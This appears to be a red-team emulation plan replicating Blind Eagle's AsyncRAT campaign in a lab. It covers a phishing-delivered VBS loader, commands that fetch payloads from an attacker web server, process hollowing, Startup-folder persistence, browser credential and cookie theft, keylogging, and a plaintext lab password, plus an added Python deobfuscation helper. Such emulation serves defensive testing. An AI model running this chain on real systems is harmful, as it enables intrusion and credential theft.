# Scenario Overview
Legend of symbols:
- 💡 - callout notes
- ❗ - extremely important note
- ➡️ - Switching to another session
- ⭕ - Sign out of something
This scenario emulates Blind Eagle TTPs based on several malware specimens either used by or associated with the Blind Eagle actors:
- AsyncRAT

# Step 0 - Setup

## 📜 Overview
This emulation leverages AsyncRAT as the C2 server and an attacker-controlled web server to host and deliver two loaders, an injector, and the final AsyncRAT payload. The AsyncRAT server is a Windows .NET GUI-based program and runs on an attacker-controlled Windows machine. A second, Ubuntu, machine serves as additional attacker infrastructure: Python hosts a simple web server whose directory structure aligns with CTI and serves the payloads.
❗ This emulation plan assumes the infrastructure described in Setup has been built. If it has not, the IP addresses and URLs below may differ.
💡 During the emulation the Exchange server mail.bancomurcielago.com was configured as an open relay, and an email from notificacion@dian-info.com with the PDF "Notificacion De Pago" attached was sent from the attacker web machine using the Linux sendemail program. A corresponding DNS entry for dian-info.com was also created on the Active Directory Domain Controller canario so that the link contained in the PDF resolves properly.
❗ If you do not wish to perform these steps, downloading the payload factura-228447578537.pdf.uue from Attacker Web (192.168.0.5) to Desk1 (10.1.0.5) also suffices; run the following from a PowerShell prompt on Desk1 during preflights:

```powershell
curl http://192.168.0.5/factura-228447578537.pdf.uue -o ~\Downloads\factura-228447578537.pdf.uue
```

## ☣️ Procedures
💡 RDP, do not SSH, to the Windows Attack Platform (192.168.0.4) hosting the C2 server. Open a new terminal window and navigate to where you cloned the repo during setup:

```powershell
cd birdsofprey\Resources\Binaries\Binaries
```

- Start the AsyncRAT server:

```powershell
.\AsyncRAT.exe
```
- ➡️ Open a second PowerShell window on your Windows Attack Platform and SSH to the Web Server (192.168.0.5) to ensure the following four malicious files are in the web, Rump, and dll directories for your user:
💡 These files are all part of the Blind Eagle phishing and attack chain and will be served from attacker infrastructure.
  - factura-228447578537.pdf.uue in web
  - new_rump_vb.net.txt in web/dll
  - Rump.xls in web/Rump
  - asy.txt in web
- Check that the files exist:

```bash
ls web
ls web/dll
ls web/Rump
```

💡 If the armed and zipped file is not there, follow the instructions for creating it, then copy the zip file to ~/web.
- Start the Python web server in a tmux session (this ensures the web server keeps running if your SSH connection drops):

```bash
cd ~/web
tmux
sudo python3 -m http.server 80
```

# Step 1 - Initial Compromise and Persistence

## 📜 Overview
Step 1 emulates Blind Eagle gaining initial access when the target user downloads, extracts, and executes a Visual Basic script reached via a link in an attachment to a spearphishing email. The email is sent from notificacion@dian-info.com. The following actions take place when the VB script is executed:
- The script uses PowerShell to download `new_rump_vb.net.txt` (`fiber.dll`) from `192.168.0.5/dll`.
- The script then loads `fiber.dll` into the current Application Domain.
- Once loaded, the `VAI` method is called, passing in an obfuscated URL pointing to the AsyncRAT payload (`asy.txt`).
- `fiber.dll` creates an artifact in `C:\Windows\Temp` called `OneDrive.vbs`, which is a copy of the VB loader.
- `fiber.dll` uses the `WebClient.DownloadString` method to download `Rump.xls` (`fsociety.dll`).
- `fiber.dll` uses `Strings.StrReverse` and `Replace` to unmangle `Rump.xls`.
- `fiber.dll` uses `Strings.StrReverse` and `Replace` to unmangle the URL pointing to `asy.txt` (the AsyncRAT payload).
- `fiber.dll` uses `WebClient.DownloadString` and `StrReverse` to download and unmangle `asy.txt`.
- `fiber.dll` uses `AppDomain.CurrentDomain.Load` and `Convert.FromBase64String` to load `Rump.xls` (`fsociety.dll`) into the current Application Domain and executes the `Ande` method of the `fsociety.Tools` class, passing in two arguments: the path to `RegSvcs.exe` and the contents of `asy.txt` with the Base64 encoding removed.
- `fsociety.dll` performs process hollowing to inject AsyncRAT into `RegSvcs.exe`.
- `fiber.dll` calls the `startup` method of the `fiber.Optical` class. This leverages the Windows Script Host to establish persistence by creating an `.lnk` file in the user's Startup folder pointing to the previously dropped `OneDrive.vbs` in `C:\Windows\Temp`.
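As an added example (not code from the birdsofprey repo or from the Blind Eagle tooling), the following Python models the unmangling steps listed above, so an analyst who pulls `Rump.xls` or `asy.txt` off the attacker web server can recover the staged assemblies and confirm they are PE images before handing them to a .NET disassembler. The page does not say what the `Replace` step substitutes, so the placeholder token (`#*` standing in for `A`) and the sample assembly bytes are assumptions; the URL is derived from the Step 0 file layout.

```python
"""Recover the stages the fiber.dll loader is described as unmangling.

Added example, not code from the birdsofprey repo or the Blind Eagle tooling.
The page states: Rump.xls and the asy.txt URL are undone with StrReverse +
Replace, asy.txt with StrReverse alone, and the assemblies are Base64-decoded.
"""
import base64
import binascii
from typing import Optional

# ASSUMPTION: the Replace step swaps one Base64 alphabet character for a
# placeholder that is not valid Base64, so the stage cannot be decoded as-is.
PLACEHOLDER = "#*"
REPLACED_CHAR = "A"
PE_MAGIC = b"MZ"  # DOS header signature every .NET assembly starts with

# Constructed sample standing in for an assembly: a DOS-header-like stub whose
# length is a multiple of 3 (so its Base64 form has no '=' padding) and whose
# tail is zero bytes, as real header padding is. Not a real binary.
FAKE_ASSEMBLY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 44
)
ASY_URL = "http://192.168.0.5/asy.txt"  # asy.txt sits in ~/web on 192.168.0.5


def unmangle_text(mangled: str) -> str:
    """Undo Replace, then StrReverse (the loader's two steps, in reverse order)."""
    return mangled.replace(PLACEHOLDER, REPLACED_CHAR)[::-1]


def mangle_text(clear: str) -> str:
    """Inverse of unmangle_text; used here only to build constructed stages."""
    return clear[::-1].replace(REPLACED_CHAR, PLACEHOLDER)


def build_stage(assembly: bytes, replaced: bool) -> str:
    """Produce a stage file in Rump.xls form (replaced=True, StrReverse + Replace)
    or asy.txt form (replaced=False, StrReverse only). Constructed samples only."""
    encoded = base64.b64encode(assembly).decode()
    return mangle_text(encoded) if replaced else encoded[::-1]


def recover_assembly(stage_text: str, replaced: bool) -> bytes:
    """Turn a downloaded stage back into assembly bytes and insist on a PE
    header, so a wrong guess at the transform fails loudly instead of silently."""
    clear = unmangle_text(stage_text) if replaced else stage_text[::-1]
    blob = base64.b64decode(clear, validate=True)
    if not blob.startswith(PE_MAGIC):
        raise ValueError("decoded stage does not start with an MZ header")
    return blob


def recover_url(mangled_url: str) -> str:
    """Recover the URL the VAI method receives for the asy.txt stage."""
    url = unmangle_text(mangled_url)
    if not url.lower().startswith(("http://", "https://")):
        raise ValueError("unmangled text is not an HTTP(S) URL")
    return url


def triage_stage(stage_text: str) -> Optional[str]:
    """For an unknown stage pulled from the web server, try each transform the
    loader is described as using and name the first one that yields a PE."""
    candidates = (
        ("base64", stage_text),
        ("reverse+base64", stage_text[::-1]),
        ("replace+reverse+base64", unmangle_text(stage_text)),
    )
    for name, text in candidates:
        try:
            blob = base64.b64decode(text, validate=True)
        except binascii.Error:  # non-alphabet characters or bad padding
            continue
        if blob.startswith(PE_MAGIC):
            return name
    return None


if __name__ == "__main__":
    rump_xls = build_stage(FAKE_ASSEMBLY, replaced=True)
    asy_txt = build_stage(FAKE_ASSEMBLY, replaced=False)
    print("Rump.xls needs:", triage_stage(rump_xls))
    print("asy.txt needs:", triage_stage(asy_txt))
    print("VAI URL:", recover_url(mangle_text(ASY_URL)))
    print("asy.txt bytes:", recover_assembly(asy_txt, replaced=False)[:8])
```

Run it directly to see which transform each constructed stage needs. For a real capture, feed the downloaded text to `triage_stage` first; once the transform is known, `recover_assembly` gives you bytes you can load in a .NET decompiler, and the MZ check stops you from mistaking a half-decoded blob for the payload.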

## ☣️ Procedures
➡️ RDP into Desk1 (10.1.0.5):
- Open Edge, browse to https://mail.bancomurcielago.com/owa, and log in as demo_admin.
💡 There should be an unread email from notificacion@dian-info.com.
- Open this email and download the PDF attachment.
- Open the PDF and click the link to download factura-228447578537.pdf.uue.
- Open File Explorer and navigate to the Downloads directory.
- Right-click factura-228447578537.pdf.uue and use WinRAR to extract it; when prompted, enter the password found in the PDF email attachment.
- Double-click the extracted factura-228447578537.pdf.vbs to execute the first stage and kick off the infection chain.
❗ Wait 30 seconds.
- Return to your RDP session on the Windows Attack Platform to confirm that AsyncRAT called back.
🔍 The C2 server should register a new AsyncRAT callback after the script is executed.

## 🔮 Reference Code & Reporting

# Step 2 - Credential Theft

## 📜 Overview
Step 2 emulates Blind Eagle performing browser credential theft using the AsyncRAT Recovery plugin.
Blind Eagle is known to monitor the currently focused window for strings such as the names of banking and other financial institution websites. The user has a session to a bank website open, so Blind Eagle attempts to steal both saved passwords and cookies from the browser.

## ☣️ Procedures
➡️ On the Windows Attack Platform (192.168.0.4) bring the AsyncRAT server window into focus.
- In the AsyncRAT server window, issue the following command to the AsyncRAT client:
  Right-click the AsyncRAT client -> Monitoring -> Password Recovery
- Once the recovery process completes, review the results on the AsyncRAT server and look for credentials in the resulting txt file:
  Right-click the AsyncRAT client -> Client Management -> Client -> Show Folder
- This opens a File Explorer window containing files named Cookies_<date> and Password_<date>. Open the Password_<date> file to verify credential collection.

## 🔮 Reference Code & Reporting

# Step 3 - Keylogging

## 📜 Overview
Step 3 emulates Blind Eagle using the keylogging plugin for AsyncRAT to capture credentials from the victim machine.

## ☣️ Procedures
➡️ On the Windows Attack Platform issue the following command to deploy the keylogger to the victim workstation:
- In the AsyncRAT server window: Right-click the client -> Monitoring -> Keylogger
- A second window opens on the AsyncRAT server indicating that keylogging is running.
➡️ RDP to Desk1 (10.1.0.5) as demo_admin from your own workstation, not from the Attack Platform, so that the attacker does not appear to have RDP'ed to the victim. On Desk1 open an Edge browser window and navigate to web.bancomurcielago.com:8000/admin/login. Enter the username administrador-murcielagos and password N@N@N@N@Murci31@g0 to log in to the Django server.
➡️ Switch to the Windows Attack Machine; the administrator username and password should appear in the keylogging window, indicating a successful capture of credentials.
- Verify that the credentials were captured correctly by opening a browser window, navigating to http://10.1.0.4:8000/admin/login, and authenticating with the captured credentials.